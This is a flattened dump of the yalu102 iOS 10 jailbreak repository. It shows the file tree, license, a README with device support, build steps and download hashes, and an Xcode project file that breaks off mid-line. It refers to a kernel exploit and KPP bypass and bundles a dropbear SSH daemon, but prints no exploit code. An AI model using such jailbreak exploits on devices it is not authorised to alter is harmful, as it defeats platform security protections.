├── .github └── ISSUE_TEMPLATE.md ├── .gitignore ├── LICENSE ├── README.md ├── yalu102.xcodeproj ├── project.pbxproj └── project.xcworkspace │ └── contents.xcworkspacedata └── yalu102 ├── 0.reload.plist ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets └── AppIcon.appiconset │ ├── AppIcon40x40@2x~ipad-1.png │ ├── AppIcon40x40@2x~ipad.png │ ├── AppIcon40x40@2x~ipadnotif.png │ ├── AppIcon40x40@2x~ipadsptl-1.png │ ├── AppIcon40x40@2x~ipadsptl.png │ ├── AppIcon40x40@2x~ipadsptl3.png │ ├── AppIcon40x40@2x~ipadsptlsmal.png │ ├── AppIcon40x40@3x~iphone.png │ ├── AppIcon40x40~ipad-1.png │ ├── AppIcon40x40~ipad-2.png │ ├── AppIcon40x40~ipad.png │ ├── AppIcon60x60.png │ ├── AppIcon60x60@2x.png │ ├── AppIcon60x60@2x~ipad.png │ ├── AppIcon60x60@2x~ipadpro.png │ ├── AppIcon60x60@3x.png │ ├── AppIcon60x60~ipad.png │ └── Contents.json ├── Base.lproj ├── LaunchScreen.storyboard └── Main.storyboard ├── IOKit.tbd ├── Info.plist ├── ViewController.h ├── ViewController.m ├── bootstrap.tar ├── devicesupport.h ├── devicesupport.m ├── dropbear.plist ├── iokitmig64.o ├── jailbreak.m ├── launchctl ├── main.m ├── offsets.c ├── offsets.h ├── patchfinder64.h ├── patchfinder64.o ├── pte_stuff.h ├── reload └── tar /.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | This is not a support forum or generic mailing list. 2 | 3 | This form is exclusively for reporting issues caused directly by the inner workings of yalu. 4 | 5 | Direct your jailbreaking questions to one of these fine communities: 6 | 7 | * https://reddit.com/r/jailbreak 8 | * http://www.jailbreakqa.com/ 9 | 10 | Issues, which are not related to yalu's code, may be closed without comment. Do NOT post about: Cydia, tweak, respring/bootloop or app issues UNLESS you have evidence that they are caused by an error in the jailbreaking software itself. 
11 | 12 | (Delete this bit after reading, and replace it by "I read the issue posting guidelines.") 13 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Xcode 2 | # 3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 4 | 5 | ## Build generated 6 | build/ 7 | DerivedData/ 8 | 9 | ## Various settings 10 | *.pbxuser 11 | !default.pbxuser 12 | *.mode1v3 13 | !default.mode1v3 14 | *.mode2v3 15 | !default.mode2v3 16 | *.perspectivev3 17 | !default.perspectivev3 18 | xcuserdata/ 19 | 20 | ## Other 21 | *.moved-aside 22 | *.xccheckout 23 | *.xcscmblueprint 24 | 25 | 26 | .DS_Store 27 | 28 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 2 | Version 2, December 2004 3 | 4 | Copyright (C) 2004 Sam Hocevar 5 | 6 | Everyone is permitted to copy and distribute verbatim or modified 7 | copies of this license document, and changing it is allowed as long 8 | as the name is changed. 9 | 10 | DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 11 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 12 | 13 | 0. You just DO WHAT THE FUCK YOU WANT TO. 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # yalu102 2 | 3 | ![Yalu logo](https://github.com/kpwn/yalu102/blob/master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png?raw=true) 4 | 5 | A "work in progress" iOS jailbreak for 64-bit devices created by [qwertyoruiopz](https://twitter.com/qwertyoruiopz) and [marcograssi](marcograss). 6 | 7 | Please use the "Issues" tab for **code related** issues only. 
If you need support please search on [/r/jailbreak](https://reddit.com/r/jailbreak) before posting a question there. 8 | 9 | ## Supported Devices and iOS versions 10 | 11 | | Device | Version | 12 | |---------|----------| 13 | | iPad Pro | iOS 10.0.0 -> iOS 10.2 | 14 | | iPhone 6S | iOS 10.0.0 -> iOS 10.2 | 15 | | iPhone SE | iOS 10.0.0 -> iOS 10.2 | 16 | | iPhone 5S | iOS 10.0.0 -> iOS 10.2 | 17 | | iPad Air| iOS 10.0.0 -> iOS 10.2 | 18 | | iPad Mini 2| iOS 10.0.0 -> iOS 10.2 | 19 | | iPhone 6 | iOS 10.0.0 -> iOS 10.2 | 20 | | iPad Mini 3| iOS 10.0.0 -> iOS 10.2 | 21 | | iPad Air 2| iOS 10.0.0 -> iOS 10.2 | 22 | | iPad Mini 4 | iOS 10.0.0 -> iOS 10.2 | 23 | | iPod touch (6G) | iOS 10.0.0 -> iOS 10.2 | 24 | 25 | ### Planned Support: 26 | 27 | In the near future, the jailbreak will support the following devices: 28 | 29 | | Device | Version | 30 | |---------|----------| 31 | | iPhone 7 | iOS 10.0.0 -> iOS 10.1.1 | 32 | 33 | **Note, the iPhone 7 is only supported till iOS 10.1.1** 34 | If you are already on iOS 10.2 with an iPhone 7, **stay there**. The actual exploit behind this still works, but the KPP bypass does not. 35 | 36 | ## Compiling: 37 | 38 | 1. `git clone` the repo. 39 | 2. Open the repo in Xcode 40 | 3. Change the bundle ID, as shown [here](https://www.reddit.com/r/sideloaded/wiki/how-to-sideload#wiki_changing_the_bundle_identifier_and_team) 41 | 4. Include the IOKit headers, and add them to your search path. 42 | 5. Run the project. 43 | 44 | ## Warnings 45 | 46 | This jailbreak is a work in progress. Some things do not work, but most things do. 47 | 48 | Do not install things that are untested. 49 | 50 | **AppSync and other unsupported and untested software will probably throw your device into a bootloop or do other bad things.** Do not open an issue complaining that your device has been bootlooped because you installed other software. You have been warned. 
51 | 52 | ## Installing 53 | 54 | > DO NOT DOWNLOAD THIS SOFTWARE FROM ANY SOURCE OTHER THAN THESE LINKS UNDER ANY CIRCUMSTANCE. IT IS VERY EASY TO BACKDOOR THIS SORT OF SOFTWARE TO CONTAIN MALWARE. PLEASE BE EXTREMELY CAREFUL. THESE MIRRORS ARE TRUSTED, BUT STILL CHECK THE SHA1. 55 | 56 | * Download the pre-compiled version from the table below. 57 | * [Check the SHA1 hash](http://onlinemd5.com) of the downloaded file (optional but recommended). The hash can also be computed locally, for example with `shasum -a 1 <downloaded file>` on macOS, which avoids uploading the file to a third-party site. The result must match the SHA1 column below exactly; a mismatch means the file is not the published build and should not be installed. 58 | * Install using [Cydia Impactor](http://www.cydiaimpactor.com/). 59 | * Open the application and follow instructions. 60 | 61 | 62 | | Version | Download | SHA1 | 63 | |---------|----------|------| 64 | | Beta 7 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta7.ipa) | 4afa99d4b568aa8cbb9ac61fddd584111fed79c5 | 65 | | Beta 6 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta6.ipa) | 0130ebe60c97e2013a4b849b7d9bc321d749f304 | 66 | | Beta 5 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta5.ipa) | f8eb6cd37054a9d25b818e3bddd13bfedbf72df1 | 67 | | Beta 4 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta4.ipa) | f8270e59d7d7267613ffa63217b91fea425eec36 | 68 | | Beta 3 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta3.ipa) | b2e0bdd31566f876d67cba036b5d29aef7ff257d | 69 | | Beta 2 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta.ipa) | 4fddad7cca8aa0c0a6579c1d63d00917f15efc86 | 70 | | Beta 1 | [Link](https://yalu.qwertyoruiop.com/yalu102_alpha.ipa) | 2fe14f1c1e1a0d26203bbb123f6747a978dd2b4f | 71 | 72 | ## Contributing 73 | 74 | Create a fork of the repository, make your changes and then create a pull request. 75 | Before creating a new pull request, please check whether the same change has already been submitted. Note, any pull requests adding IOKit headers will be closed.
Please respect copyright laws, and do not distribute / download IOKit headers from unofficial sources: they are bundled legally with macOS SDK 76 | 77 | -------------------------------------------------------------------------------- /yalu102.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 46; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; 11 | EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; 12 | EA1A3BAD1E399006009CA025 /* reload in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BAC1E399006009CA025 /* reload */; }; 13 | EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */; }; 14 | EA9900E81E1E9F060056FEBD /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900E71E1E9F060056FEBD /* main.m */; }; 15 | EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900EA1E1E9F060056FEBD /* AppDelegate.m */; }; 16 | EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900ED1E1E9F060056FEBD /* ViewController.m */; }; 17 | EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900EF1E1E9F060056FEBD /* Main.storyboard */; }; 18 | EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */; }; 19 | EA9901041E219C210056FEBD /* offsets.c in Sources */ = {isa = PBXBuildFile; fileRef = EA9901021E219C210056FEBD /* offsets.c */; }; 20 | EA9901061E219FF10056FEBD /* bootstrap.tar in 
Resources */ = {isa = PBXBuildFile; fileRef = EA9901051E219FF10056FEBD /* bootstrap.tar */; }; 21 | EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; }; 22 | EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; }; 23 | EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; }; 24 | EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901131E21A1B00056FEBD /* iokitmig64.o */; }; 25 | EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; }; 26 | EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901181E21A2180056FEBD /* IOKit.tbd */; }; 27 | EAA7F7C71E3EE4AF00BE3C64 /* dropbear.plist in Resources */ = {isa = PBXBuildFile; fileRef = EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */; }; 28 | /* End PBXBuildFile section */ 29 | 30 | /* Begin PBXFileReference section */ 31 | EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; 32 | EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; 33 | EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; 34 | EA1A3BAC1E399006009CA025 /* reload */ = {isa = PBXFileReference; lastKnownFileType = text.script.sh; path = reload; sourceTree = ""; }; 35 | EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 36 | EA9900E31E1E9F060056FEBD /* 
yalu102.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = yalu102.app; sourceTree = BUILT_PRODUCTS_DIR; }; 37 | EA9900E71E1E9F060056FEBD /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 38 | EA9900E91E1E9F060056FEBD /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 39 | EA9900EA1E1E9F060056FEBD /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 40 | EA9900EC1E1E9F060056FEBD /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 41 | EA9900ED1E1E9F060056FEBD /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 42 | EA9900F01E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 43 | EA9900F51E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 44 | EA9900F71E1E9F060056FEBD /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 45 | EA9901021E219C210056FEBD /* offsets.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsets.c; sourceTree = ""; }; 46 | EA9901031E219C210056FEBD /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; 47 | EA9901051E219FF10056FEBD /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; }; 48 | EA9901091E21A04C0056FEBD /* tar */ = {isa = PBXFileReference; 
lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; }; 49 | EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; 50 | EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; 51 | EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; 52 | EA9901131E21A1B00056FEBD /* iokitmig64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = iokitmig64.o; sourceTree = ""; }; 53 | EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; }; 54 | EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; }; 55 | EA9901181E21A2180056FEBD /* IOKit.tbd */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = "sourcecode.text-based-dylib-definition"; path = IOKit.tbd; sourceTree = ""; }; 56 | EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */ = {isa = PBXFileReference; explicitFileType = file.bplist; path = dropbear.plist; sourceTree = ""; }; 57 | /* End PBXFileReference section */ 58 | 59 | /* Begin PBXFrameworksBuildPhase section */ 60 | EA9900E01E1E9F060056FEBD /* Frameworks */ = { 61 | isa = PBXFrameworksBuildPhase; 62 | buildActionMask = 2147483647; 63 | files = ( 64 | EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */, 65 | EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */, 66 | EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */, 67 | ); 68 | runOnlyForDeploymentPostprocessing = 0; 69 | }; 70 | /* End PBXFrameworksBuildPhase section */ 71 | 72 | /* Begin 
PBXGroup section */ 73 | EA9900DA1E1E9F060056FEBD = { 74 | isa = PBXGroup; 75 | children = ( 76 | EA9900E51E1E9F060056FEBD /* yalu102 */, 77 | EA9900E41E1E9F060056FEBD /* Products */, 78 | ); 79 | sourceTree = ""; 80 | }; 81 | EA9900E41E1E9F060056FEBD /* Products */ = { 82 | isa = PBXGroup; 83 | children = ( 84 | EA9900E31E1E9F060056FEBD /* yalu102.app */, 85 | ); 86 | name = Products; 87 | sourceTree = ""; 88 | }; 89 | EA9900E51E1E9F060056FEBD /* yalu102 */ = { 90 | isa = PBXGroup; 91 | children = ( 92 | EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */, 93 | EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, 94 | EA9901021E219C210056FEBD /* offsets.c */, 95 | EA9901031E219C210056FEBD /* offsets.h */, 96 | EA99010D1E21A1560056FEBD /* jailbreak.m */, 97 | EA9900E91E1E9F060056FEBD /* AppDelegate.h */, 98 | EA1A3BA61E398E33009CA025 /* 0.reload.plist */, 99 | EA1A3BAC1E399006009CA025 /* reload */, 100 | EA9900EA1E1E9F060056FEBD /* AppDelegate.m */, 101 | EA9900EC1E1E9F060056FEBD /* ViewController.h */, 102 | EA9900ED1E1E9F060056FEBD /* ViewController.m */, 103 | EA9900EF1E1E9F060056FEBD /* Main.storyboard */, 104 | EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, 105 | EA9900F71E1E9F060056FEBD /* Info.plist */, 106 | EA9901051E219FF10056FEBD /* bootstrap.tar */, 107 | EA9901091E21A04C0056FEBD /* tar */, 108 | EA99010B1E21A0520056FEBD /* launchctl */, 109 | EA9901131E21A1B00056FEBD /* iokitmig64.o */, 110 | EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, 111 | EA99010F1E21A1A00056FEBD /* pte_stuff.h */, 112 | EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, 113 | EA9901181E21A2180056FEBD /* IOKit.tbd */, 114 | EA9901151E21A1D90056FEBD /* devicesupport.h */, 115 | EA9901161E21A1D90056FEBD /* devicesupport.m */, 116 | EA9900E61E1E9F060056FEBD /* Supporting Files */, 117 | ); 118 | path = yalu102; 119 | sourceTree = ""; 120 | }; 121 | EA9900E61E1E9F060056FEBD /* Supporting Files */ = { 122 | isa = PBXGroup; 123 | children = ( 124 | EA9900E71E1E9F060056FEBD /* main.m */, 
125 | ); 126 | name = "Supporting Files"; 127 | sourceTree = ""; 128 | }; 129 | /* End PBXGroup section */ 130 | 131 | /* Begin PBXNativeTarget section */ 132 | EA9900E21E1E9F060056FEBD /* yalu102 */ = { 133 | isa = PBXNativeTarget; 134 | buildConfigurationList = EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */; 135 | buildPhases = ( 136 | EA9900DF1E1E9F060056FEBD /* Sources */, 137 | EA9900E01E1E9F060056FEBD /* Frameworks */, 138 | EA9900E11E1E9F060056FEBD /* Resources */, 139 | ); 140 | buildRules = ( 141 | ); 142 | dependencies = ( 143 | ); 144 | name = yalu102; 145 | productName = yalu102; 146 | productReference = EA9900E31E1E9F060056FEBD /* yalu102.app */; 147 | productType = "com.apple.product-type.application"; 148 | }; 149 | /* End PBXNativeTarget section */ 150 | 151 | /* Begin PBXProject section */ 152 | EA9900DB1E1E9F060056FEBD /* Project object */ = { 153 | isa = PBXProject; 154 | attributes = { 155 | LastUpgradeCheck = 0820; 156 | ORGANIZATIONNAME = kimjongcracks; 157 | TargetAttributes = { 158 | EA9900E21E1E9F060056FEBD = { 159 | CreatedOnToolsVersion = 8.2.1; 160 | DevelopmentTeam = CGTX3WH3ZS; 161 | ProvisioningStyle = Automatic; 162 | }; 163 | }; 164 | }; 165 | buildConfigurationList = EA9900DE1E1E9F060056FEBD /* Build configuration list for PBXProject "yalu102" */; 166 | compatibilityVersion = "Xcode 3.2"; 167 | developmentRegion = English; 168 | hasScannedForEncodings = 0; 169 | knownRegions = ( 170 | en, 171 | Base, 172 | ); 173 | mainGroup = EA9900DA1E1E9F060056FEBD; 174 | productRefGroup = EA9900E41E1E9F060056FEBD /* Products */; 175 | projectDirPath = ""; 176 | projectRoot = ""; 177 | targets = ( 178 | EA9900E21E1E9F060056FEBD /* yalu102 */, 179 | ); 180 | }; 181 | /* End PBXProject section */ 182 | 183 | /* Begin PBXResourcesBuildPhase section */ 184 | EA9900E11E1E9F060056FEBD /* Resources */ = { 185 | isa = PBXResourcesBuildPhase; 186 | buildActionMask = 2147483647; 187 | files = ( 188 | 
EA99010A1E21A04C0056FEBD /* tar in Resources */, 189 | EA99010C1E21A0520056FEBD /* launchctl in Resources */, 190 | EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */, 191 | EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */, 192 | EAA7F7C71E3EE4AF00BE3C64 /* dropbear.plist in Resources */, 193 | EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */, 194 | EA1A3BAD1E399006009CA025 /* reload in Resources */, 195 | EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */, 196 | EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */, 197 | ); 198 | runOnlyForDeploymentPostprocessing = 0; 199 | }; 200 | /* End PBXResourcesBuildPhase section */ 201 | 202 | /* Begin PBXSourcesBuildPhase section */ 203 | EA9900DF1E1E9F060056FEBD /* Sources */ = { 204 | isa = PBXSourcesBuildPhase; 205 | buildActionMask = 2147483647; 206 | files = ( 207 | EA9901041E219C210056FEBD /* offsets.c in Sources */, 208 | EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */, 209 | EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */, 210 | EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */, 211 | EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */, 212 | EA9900E81E1E9F060056FEBD /* main.m in Sources */, 213 | ); 214 | runOnlyForDeploymentPostprocessing = 0; 215 | }; 216 | /* End PBXSourcesBuildPhase section */ 217 | 218 | /* Begin PBXVariantGroup section */ 219 | EA9900EF1E1E9F060056FEBD /* Main.storyboard */ = { 220 | isa = PBXVariantGroup; 221 | children = ( 222 | EA9900F01E1E9F060056FEBD /* Base */, 223 | ); 224 | name = Main.storyboard; 225 | sourceTree = ""; 226 | }; 227 | EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */ = { 228 | isa = PBXVariantGroup; 229 | children = ( 230 | EA9900F51E1E9F060056FEBD /* Base */, 231 | ); 232 | name = LaunchScreen.storyboard; 233 | sourceTree = ""; 234 | }; 235 | /* End PBXVariantGroup section */ 236 | 237 | /* Begin XCBuildConfiguration section */ 238 | EA9900F81E1E9F060056FEBD /* Debug */ = { 239 | 
isa = XCBuildConfiguration; 240 | buildSettings = { 241 | ALWAYS_SEARCH_USER_PATHS = NO; 242 | ARCHS = armv7; 243 | CLANG_ANALYZER_NONNULL = YES; 244 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 245 | CLANG_CXX_LIBRARY = "libc++"; 246 | CLANG_ENABLE_MODULES = YES; 247 | CLANG_ENABLE_OBJC_ARC = YES; 248 | CLANG_WARN_BOOL_CONVERSION = YES; 249 | CLANG_WARN_CONSTANT_CONVERSION = YES; 250 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 251 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 252 | CLANG_WARN_EMPTY_BODY = YES; 253 | CLANG_WARN_ENUM_CONVERSION = YES; 254 | CLANG_WARN_INFINITE_RECURSION = YES; 255 | CLANG_WARN_INT_CONVERSION = YES; 256 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 257 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 258 | CLANG_WARN_UNREACHABLE_CODE = YES; 259 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 260 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 261 | COPY_PHASE_STRIP = NO; 262 | DEBUG_INFORMATION_FORMAT = dwarf; 263 | ENABLE_BITCODE = NO; 264 | ENABLE_STRICT_OBJC_MSGSEND = YES; 265 | ENABLE_TESTABILITY = YES; 266 | GCC_C_LANGUAGE_STANDARD = gnu99; 267 | GCC_DYNAMIC_NO_PIC = NO; 268 | GCC_NO_COMMON_BLOCKS = YES; 269 | GCC_OPTIMIZATION_LEVEL = 0; 270 | GCC_PREPROCESSOR_DEFINITIONS = ( 271 | "DEBUG=1", 272 | "$(inherited)", 273 | ); 274 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 275 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 276 | GCC_WARN_UNDECLARED_SELECTOR = YES; 277 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 278 | GCC_WARN_UNUSED_FUNCTION = YES; 279 | GCC_WARN_UNUSED_VARIABLE = YES; 280 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 281 | LD_NO_PIE = YES; 282 | MTL_ENABLE_DEBUG_INFO = YES; 283 | ONLY_ACTIVE_ARCH = YES; 284 | SDKROOT = iphoneos; 285 | TARGETED_DEVICE_FAMILY = "1,2"; 286 | }; 287 | name = Debug; 288 | }; 289 | EA9900F91E1E9F060056FEBD /* Release */ = { 290 | isa = XCBuildConfiguration; 291 | buildSettings = { 292 | ALWAYS_SEARCH_USER_PATHS = NO; 293 | ARCHS = armv7; 294 | CLANG_ANALYZER_NONNULL = YES; 295 | CLANG_CXX_LANGUAGE_STANDARD 
= "gnu++0x"; 296 | CLANG_CXX_LIBRARY = "libc++"; 297 | CLANG_ENABLE_MODULES = YES; 298 | CLANG_ENABLE_OBJC_ARC = YES; 299 | CLANG_WARN_BOOL_CONVERSION = YES; 300 | CLANG_WARN_CONSTANT_CONVERSION = YES; 301 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 302 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 303 | CLANG_WARN_EMPTY_BODY = YES; 304 | CLANG_WARN_ENUM_CONVERSION = YES; 305 | CLANG_WARN_INFINITE_RECURSION = YES; 306 | CLANG_WARN_INT_CONVERSION = YES; 307 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 308 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 309 | CLANG_WARN_UNREACHABLE_CODE = YES; 310 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 311 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 312 | COPY_PHASE_STRIP = NO; 313 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 314 | ENABLE_BITCODE = NO; 315 | ENABLE_NS_ASSERTIONS = NO; 316 | ENABLE_STRICT_OBJC_MSGSEND = YES; 317 | GCC_C_LANGUAGE_STANDARD = gnu99; 318 | GCC_NO_COMMON_BLOCKS = YES; 319 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 320 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 321 | GCC_WARN_UNDECLARED_SELECTOR = YES; 322 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 323 | GCC_WARN_UNUSED_FUNCTION = YES; 324 | GCC_WARN_UNUSED_VARIABLE = YES; 325 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 326 | LD_NO_PIE = YES; 327 | MTL_ENABLE_DEBUG_INFO = NO; 328 | SDKROOT = iphoneos; 329 | TARGETED_DEVICE_FAMILY = "1,2"; 330 | VALIDATE_PRODUCT = YES; 331 | }; 332 | name = Release; 333 | }; 334 | EA9900FB1E1E9F060056FEBD /* Debug */ = { 335 | isa = XCBuildConfiguration; 336 | buildSettings = { 337 | ARCHS = armv7; 338 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 339 | CLANG_ENABLE_OBJC_ARC = NO; 340 | DEVELOPMENT_TEAM = CGTX3WH3ZS; 341 | INFOPLIST_FILE = yalu102/Info.plist; 342 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 343 | LIBRARY_SEARCH_PATHS = ( 344 | "$(inherited)", 345 | "$(PROJECT_DIR)/yalu102", 346 | ); 347 | PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; 348 | PRODUCT_NAME = 
